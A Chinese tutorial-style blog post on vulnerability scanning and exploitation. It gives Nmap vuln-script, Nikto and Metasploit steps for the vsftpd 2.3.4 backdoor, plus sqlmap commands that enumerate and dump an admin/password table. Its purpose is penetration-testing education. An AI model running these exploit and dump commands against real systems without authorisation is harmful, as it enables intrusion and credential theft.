当前位置: 开发笔记 > 编程语言 > 正文

六、漏洞扫描

作者：客官真的真的不可以 | 来源：互联网 | 2023-08-31 01:26

系统漏洞扫描漏洞扫描原理漏洞扫描器对漏洞进行扫描，以验证具体目标是否存在对应的具体漏洞。但也存在错误扫描，需要对扫描结果进行漏洞验证扫描器原理大致相同

系统漏洞扫描

漏洞扫描原理
- 漏洞扫描器对漏洞进行扫描&＃xff0c;以验证具体目标是否存在对应的具体漏洞。但也存在错误扫描&＃xff0c;需要对扫描结果进行漏洞验证
- 扫描器原理大致相同&＃xff0c;都是通过发送对应的验证数据到目标具体服务进行验证。到收到响应与存在漏洞的响应一致时&＃xff0c;就表明存在漏洞
漏洞扫描工具-Nmap
- nmap --script vuln 目标IP地址
漏洞扫描工具-nessus
漏洞利用metasploit
- 利用Metasploit对扫描到的漏洞加以利用以vsftpd2.3.4为例
- Kali 进入metasploit
  - msfconsole&＃xff08;建议msfdb run&＃xff09;
- 查找漏洞
  - search vsftpd
- 使用漏洞
  - use exploit/unix/ftp/vsftpd 234 backdoor
    - 查看需要设置的参数
      - show options
    - 查看可利用的攻击模块
      - show payloads
      - set 攻击模块名–设置攻击模块
      - set rhosts IP地址&＃xff08;攻击目标的IP&＃xff09;
      - 攻击
        exploit/run

Web程序漏洞扫描

针对Web应用程序的漏洞扫描其实就是每个扫描器读取自己的Payload进行探测
- Web漏洞扫描器
  1. Owasp-zap
  2. AWVS
  3. Appscan
  4. Nikto
  5. Burpsuite
- 每个扫描器都有各自不同的Payload进行探测
OWASP-ZAP漏洞扫描
- OWASP-ZAP是OWASP组织开发的用于Web应用程序漏洞扫描器。免费开源&＃xff0c;不断更新维护
nikto漏洞扫描
- 对目标服务器进行漏洞扫描。主要针对HTTP服务器
  - nilto --host IP地址
漏洞利用
- 使用sqlmap对扫描到的Sql注入漏洞进行利用
- sqlmap -u “漏洞的URL”
- sqlmap -u “漏洞URL” --tables &＃xff08;爆表&＃xff0c;假设爆出的表名admin&＃xff09;
- sqlmap -u “漏洞URL” -T admin --columns &＃xff08;爆admin表的列名&＃xff0c;假设admin&＃xff0c;password&＃xff09;
- sqlmap -u “漏洞URL” -T admin -C “admin, password” --dump &＃xff08;获取对应的数据&＃xff09;

推荐阅读

ip
使用cacti监控mssql 2005运行资源情况的操作步骤

本文介绍了使用cacti监控mssql 2005运行资源情况的操作步骤，包括安装必要的工具和驱动，测试mssql的连接，配置监控脚本等。通过php连接mssql来获取SQL 2005性能计算器的值，实现对mssql的监控。详细的操作步骤和代码请参考附件。 ... [详细]

蜡笔小新 2023-12-12 13:57:58
ip
揭秘阿里云WAF背后神秘的AI智能防御体系

背景应用安全领域，各类攻击长久以来都危害着互联网上的应用，在web应用安全风险中，各类注入、跨站等攻击仍然占据着较前的位置。WAF(Web应用防火墙)正是为防御和阻断这类攻击而存在 ... [详细]

蜡笔小新 2023-12-11 01:30:52
ip
浅解XXE与Portswigger Web Sec

XXE与PortswiggerWebSec相关链接：博客园安全脉搏FreeBufXML的全称为XML外部实体注入，在学习的过程中发现有回显的XXE并不多，而 ... [详细]

蜡笔小新 2023-10-17 16:52:48
ip
Nginx使用AWStats日志分析的步骤及注意事项

本文介绍了在Centos7操作系统上使用Nginx和AWStats进行日志分析的步骤和注意事项。通过AWStats可以统计网站的访问量、IP地址、操作系统、浏览器等信息，并提供精确到每月、每日、每小时的数据。在部署AWStats之前需要确认服务器上已经安装了Perl环境，并进行DNS解析。 ... [详细]

蜡笔小新 2023-12-14 19:42:01
ip
Metasploit攻击渗透实践

本文介绍了Metasploit攻击渗透实践的内容和要求，包括主动攻击、针对浏览器和客户端的攻击，以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码，以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]

蜡笔小新 2023-12-14 12:14:09
list
postman测试登录后的接口_使用postman进行接口测试的方法(测试用户管理模块)

本文介绍了使用postman进行接口测试的方法，以测试用户管理模块为例。首先需要下载并安装postman，然后创建基本的请求并填写用户名密码进行登录测试。接下来可以进行用户查询和新增的测试。在新增时，可以进行异常测试，包括用户名超长和输入特殊字符的情况。通过测试发现后台没有对参数长度和特殊字符进行检查和过滤。 ... [详细]

蜡笔小新 2023-12-14 10:29:45
ip
Webmin远程命令执行漏洞复现及防护方法

本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法，同时提供了防护方法。漏洞存在于Webmin的找回密码页面中，攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外，还指出了参考链接中的数据包不准确的问题，并解释了漏洞触发的条件。最后，给出了防护方法以避免受到该漏洞的攻击。 ... [详细]

蜡笔小新 2023-12-13 16:14:53
ip
如何在服务器主机上实现文件共享的方法和工具

本文介绍了在服务器主机上实现文件共享的方法和工具，包括Linux主机和Windows主机的文件传输方式，Web运维和FTP/SFTP客户端运维两种方式，以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外，还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK，以及主机迁移服务会收集的源端服务器信息。 ... [详细]

蜡笔小新 2023-12-13 13:23:48
js
如何限制php数据库链接数和连接超时时间？

本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目，以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数，以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]

蜡笔小新 2023-12-14 14:06:10
object
阿里云物联网 .NET Core 客户端 | CZGL.AliIoTClient：4. 设备上报属性

阿,里,云,物,联网,net,core,客户端,czgl,aliiotclient, ... [详细]

蜡笔小新 2023-12-14 12:40:20
ip
操作系统的定义和功能

本文介绍了操作系统的定义和功能，包括操作系统的本质、用户界面以及系统调用的分类。同时还介绍了进程和线程的区别，包括进程和线程的定义和作用。 ... [详细]

蜡笔小新 2023-12-11 14:17:13
install
Linux下安装免费杀毒软件ClamAV及使用方法

本文介绍了在Linux系统下安装免费杀毒软件ClamAV的方法，并提供了使用该软件更新病毒库和进行病毒扫描的指令参数。同时还提供了官方安装文档和下载地址。 ... [详细]

蜡笔小新 2023-12-10 14:10:51
search
PostgreSQL OR条件

PostgreSQLOR条件与WHERE子句一起使用，以从表中的一列或多列列中选择唯一数据。语法 ... [详细]

蜡笔小新 2023-12-09 19:08:09
js
node . js urlsearchparams API

node.jsurlsearchparamsAPI哎哎哎 ... [详细]

蜡笔小新 2023-12-09 18:08:10
list
【重识云原生】第四章云网络4.8.3.2节——Open vSwitch工作原理详解

2OpenvSwitch架构2.1OVS整体架构ovs-vswitchd：守护程序，实现交换功能，和Linux内核兼容模块一起，实现基于流的交换flow-basedswitchin ... [详细]

蜡笔小新 2023-12-09 10:34:07

客官真的真的不可以

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章